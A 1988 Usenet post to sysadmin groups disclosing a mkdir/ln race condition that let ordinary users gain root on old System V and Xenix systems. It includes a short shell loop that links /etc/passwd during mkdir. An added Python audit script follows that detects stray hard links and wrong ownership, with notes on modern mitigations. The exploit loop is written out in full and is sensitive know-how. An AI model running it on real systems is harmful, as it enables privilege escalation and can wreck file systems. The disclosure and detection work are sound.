Xref: utzoo news.sysadmin:1787 news.admin:4155
Path: utzoo!utgpu!watmath!clyde!att!rutgers!cmcl2!nrl-cmf!ukma!gatech!purdue!decwrl!sun!pitstop!sundc!seismo!uunet!mcvax!unido!altger!blue
From: blue@altger.UUCP (blue)
Newsgroups: news.sysadmin,news.admin
Subject: security hole
Keywords: security, bug
Message-ID: <1191@altger.UUCP>
Date: 2 Dec 88 00:27:20 GMT
Organization: Altos Computer Systems Munich
Lines: 28

I am probably saying something already known by everybody.
Anyway, there's (was) a bug on many Unix systems, related to
the mkdir and ln commands.
Practically, ANYONE could be root on such systems, by working out
a simple shell script like this one:

   while true
   do
       nice -39 mkdir foo &
       rm -rf foo
       ln /etc/passwd foo; rm -fr foo &
       ls -l /etc/passwd
   done

What happens is that sometimes - on old versions - you fool Unix by catching
mkdir while it is creating its i-nodes. There has to be a millisecond while
mkdir has created HIS foo, and is going to change ownership to yours.
Ok, being new on Usenet maybe I missed this explanation 1000 times.
What's incredible is that this trick worked out perfectly a few months ago
on altger here, an Altos 386 running Unix Sys V.3, worked again on
Unix/386 I think on IBM PS-2/80, where instead of passwd /dev/hd00 was
linked successfully (system: aragon). Worked still better on Altos Xenix
386 (altos 2000?), dos the "linker" does not work, but all you have to do is change
the nice value, add some slowdown, run two linkers at the same time etc.

Side effects: file system will need to be checked out after reboot.
Worst side effects: if this works, run by a hacker, you probably
won't find any file system at all...
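The condition the post describes at the end of a successful race is visible in inode metadata alone: the target file gains a second directory entry (link count above one) and its owner is no longer root. The following audit script is an added example for defenders and is not code from the original post; the file paths, search roots, expected owner and the temporary fixture in demo() are all assumptions chosen for illustration.

```python
"""Hard-link and ownership audit for a sensitive file.

Added example, not code from the original post. The outcome the post
describes is visible from inode metadata: the targeted file (e.g.
/etc/passwd) ends up with a second directory entry (st_nlink > 1) and
with an owner other than the expected one (st_uid != 0). This script
reports both conditions and locates the extra names. Paths, search
roots and the expected owner are parameters; nothing here is specific
to the systems named in the post.
"""
import os
import stat
import tempfile
from dataclasses import dataclass, field


@dataclass
class LinkAudit:
    path: str
    inode: int
    nlink: int                 # directory entries sharing this inode
    uid: int                   # owner found on the inode
    expected_uid: int          # owner the file should have (0 for /etc/passwd)
    mode: int                  # permission bits only
    extra_links: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # A second name, a wrong owner or world-writability is exactly
        # what the post reports after a successful race.
        return (self.nlink > 1
                or self.uid != self.expected_uid
                or bool(self.mode & stat.S_IWOTH))


def audit_hard_links(sensitive_path, search_roots, expected_uid=0):
    """Return a LinkAudit for sensitive_path, listing other names for its
    inode found beneath search_roots. Directories are walked without
    following symlinks; the (st_dev, st_ino) compare ignores other devices."""
    st = os.lstat(sensitive_path)
    key = (st.st_dev, st.st_ino)
    canonical = os.path.abspath(sensitive_path)
    extra = []
    for root in search_roots:
        for dirpath, _dirnames, filenames in os.walk(root):
            for name in filenames:
                p = os.path.join(dirpath, name)
                try:
                    s = os.lstat(p)
                except OSError:
                    continue        # entry vanished or is unreadable; skip it
                if (s.st_dev, s.st_ino) == key and os.path.abspath(p) != canonical:
                    extra.append(p)
    return LinkAudit(path=sensitive_path, inode=st.st_ino, nlink=st.st_nlink,
                     uid=st.st_uid, expected_uid=expected_uid,
                     mode=stat.S_IMODE(st.st_mode), extra_links=sorted(extra))


def demo():
    """Constructed fixture (hypothetical): a fake passwd file in a temp
    directory plus a hard link to it named 'foo' in a subdirectory, the
    shape the post's loop leaves behind. Audited before and after the
    link is removed."""
    base = tempfile.mkdtemp(prefix="linkaudit-")
    target = os.path.join(base, "passwd")
    with open(target, "w") as fh:
        fh.write("root:x:0:0:root:/root:/bin/sh\n")   # constructed sample line
    os.chmod(target, 0o644)                           # not world-writable
    os.mkdir(os.path.join(base, "home"))
    link = os.path.join(base, "home", "foo")
    os.link(target, link)
    me = os.getuid()                     # the fixture file is legitimately ours
    before = audit_hard_links(target, [base], expected_uid=me)
    os.unlink(link)
    after = audit_hard_links(target, [base], expected_uid=me)
    return before, after


if __name__ == "__main__":
    b, a = demo()
    print("with link:    nlink=%d extra=%s suspicious=%s"
          % (b.nlink, b.extra_links, b.suspicious))
    print("link removed: nlink=%d extra=%s suspicious=%s"
          % (a.nlink, a.extra_links, a.suspicious))
```

On a real host you would call audit_hard_links("/etc/passwd", ["/home", "/tmp", "/var/tmp"]) from a cron job and alert on suspicious. Two caveats on modern systems: mkdir(2) is a single atomic system call in current kernels, so no setuid mkdir binary exists to race, and Linux with fs.protected_hardlinks=1 refuses a hard link to a file the caller does not own, so the ln step in the post's loop fails outright; the audit still catches links created before that setting was enabled or on filesystems where it does not apply.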